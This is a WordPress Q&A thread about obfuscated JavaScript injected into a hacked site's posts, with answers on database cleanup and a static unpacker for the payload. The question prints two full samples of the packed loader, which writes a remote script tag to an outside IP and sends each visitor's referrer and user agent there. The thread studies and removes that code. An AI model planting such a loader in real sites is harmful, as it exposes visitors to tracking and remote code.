hacked - Why would a hacker add this code to each post, and how to do mass cleanup?

Here is example of code I have seen inserted in two different posts:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

What would a hacker get out of this?

How can I do a mass-replace? Can I do a regex in MySQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

asked Apr 12, 2019 at 21:34 by NealWalters

  • Are you investigating this just for learning purposes? Or do you need help cleaning up an infected site? It's two questions in one thread. – user3135691, Apr 12, 2019 at 22:25

3 Answers

As I was using MariaDB, the following update did the fix:

update wp_posts set post_content = REGEXP_REPLACE(post_content,'(*CRLF)<noindex>.*</noindex> ','')

See https://dba.stackexchange/questions/234774/mariadb-multiline-regex/234778#234778
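An added example, not from the answer above: a dry run plus a removal anchored on the script id that both samples share, run over constructed rows shaped like wp_posts. It also shows the caveat that a bare greedy `<noindex>.*</noindex>` pattern runs from the first `<noindex>` to the last `</noindex>` in a post, so legitimate content between two injected blocks (or a legitimate noindex element) goes with it. The marker value is assumed from the two samples in the question.

```python
import re

MARKER = '<noindex><script id="wpinfo-pst1"'

# Constructed rows shaped like wp_posts (ID, post_content); the injected block copies the
# layout of the question's samples with the packed payload shortened. Not real site data.
INJECTED = (MARKER + ' type="text/javascript" rel="nofollow">'
            'eval(function(p,a,c,k,e,d){/* packed loader */}("...",30,30,"...".split("|"),0,{}))\n'
            '</script></noindex>')
LEGIT_NOINDEX = '<noindex>Sidebar text that search engines should skip.</noindex>'
SAMPLE_ROWS = [
    (1, "<p>Hello world</p>\n" + INJECTED),
    (2, "<p>Clean post</p>\n" + LEGIT_NOINDEX),
    (3, INJECTED + "\n<p>Keep this paragraph</p>\n" + INJECTED),
]

# A bare, greedy pattern: runs from the first <noindex> to the last </noindex> in the
# post, swallowing anything in between.
GREEDY = re.compile(r"<noindex>.*</noindex>", re.DOTALL)
# Anchored on the injected script id and non-greedy: each block is removed on its own and
# a legitimate <noindex> element is left alone. MariaDB's REGEXP_REPLACE takes the same
# PCRE syntax, with (?s) standing in for re.DOTALL.
SAFE = re.compile(re.escape(MARKER) + r".*?</script></noindex>", re.DOTALL)

def find_infected(rows):
    """Dry run: IDs of rows carrying the marker. Run (and save) this before any UPDATE."""
    return [pid for pid, content in rows if MARKER in content]

def strip_injected(content, pattern=SAFE):
    """Remove every match of `pattern` and trim the blank lines the removal leaves behind."""
    return pattern.sub("", content).strip()

def clean_rows(rows, pattern=SAFE):
    """Apply strip_injected to every row, returning new (ID, post_content) tuples."""
    return [(pid, strip_injected(content, pattern)) for pid, content in rows]

if __name__ == "__main__":
    print("infected:", find_infected(SAMPLE_ROWS))
    for pid, content in clean_rows(SAMPLE_ROWS):
        print(pid, repr(content))
```

Run the dry run and a backup of wp_posts before any UPDATE, and re-run the dry run afterwards to confirm nothing carrying the marker remains.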

I'm sorry to see your site has malicious code in it. Unfortunately, helping to fix compromised sites is outside the scope of this community.

I can answer your first question, though. This code appears to be garbled, but it is redirecting traffic from your site to some IP address with a path. I can't say exactly why, but this is usually to generate referral traffic, generate cryptocurrency, or compromise browsers in an effort to glean valuable personal information.

It's dangerous to your visitors to leave this code on your site.
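An added example, not part of the answer above: a static unpacker for the `eval(function(p,a,c,k,e,d){...})` wrapper used in both samples, so the injected script can be read (and its remote URL pulled out for blocklists and log searches) without ever executing it. The packed arguments are taken from the first sample in the question; the helper names are this example's own.

```python
import re

# Taken from the first sample in the question: the arguments handed to the
# eval(function(p,a,c,k,e,d){...}) packer (payload, radix, token count, word list).
PACKED_P = r'''0.6("<a g='2' c='d' e='b/2' 4='7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"'><\/k"+"l>");n m="q";'''
PACKED_A, PACKED_C = 30, 30
PACKED_K = ('document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow'
            '|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer'
            '|fdrht||js|php')

def to_radix(n, radix):
    """Lowercase base-`radix` digits for n, matching JavaScript's Number.toString(radix) for radix <= 36."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while True:
        out = digits[n % radix] + out
        n //= radix
        if n == 0:
            return out

def unpack(p, a, c, k):
    """Reverse the packer statically (nothing is eval'd). Every word token in p is a base-`a`
    index into k; an empty k entry means the token stands for itself. This is the dictionary
    the packer itself builds before its single replace pass in current browsers."""
    if a > 36:
        raise ValueError("radix > 36 packers use a different token alphabet; not handled here")
    words = k.split("|")
    table = {}
    for i in range(c):
        tok = to_radix(i, a)
        table[tok] = words[i] if i < len(words) and words[i] else tok
    # JavaScript's \w is [A-Za-z0-9_]; spelled out so Python's Unicode-aware \w cannot differ.
    return re.sub(r"[A-Za-z0-9_]+", lambda m: table.get(m.group(0), m.group(0)), p)

def extract_urls(js):
    """Literal URL prefixes in decoded script text, for blocklists and access-log searches."""
    return re.findall(r"""https?://[^\s'"<>]+""", js)

if __name__ == "__main__":
    decoded = unpack(PACKED_P, PACKED_A, PACKED_C, PACKED_K)
    print(decoded)
    print(extract_urls(decoded))
```

The decoded text is a `document.write` of a second `<script>` tag whose `src` points at a remote `jquery.js.php` and carries the visitor's referrer and user agent as query parameters, which is the loader behaviour the answer describes.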

There is lots of info on the googles (or bings, or ducks) about how to clean up a site. And it is true that your question is out of scope for this place.

But, it is something that is asked often. Code that you don't recognize is probably dangerous to your site and your visitors. (Like the code that was inside the "Yellow Pencil" theme, and other themes/plugins that have been compromised.)

So, cleaning is important. And it can be done, although it is a bit of work (I've done it for clients).

See my (accepted) answer here for my recommendations: Is this a hacking script in function.php? If it was my site (or one that I manage), that's the procedure I would use to clean up a site.
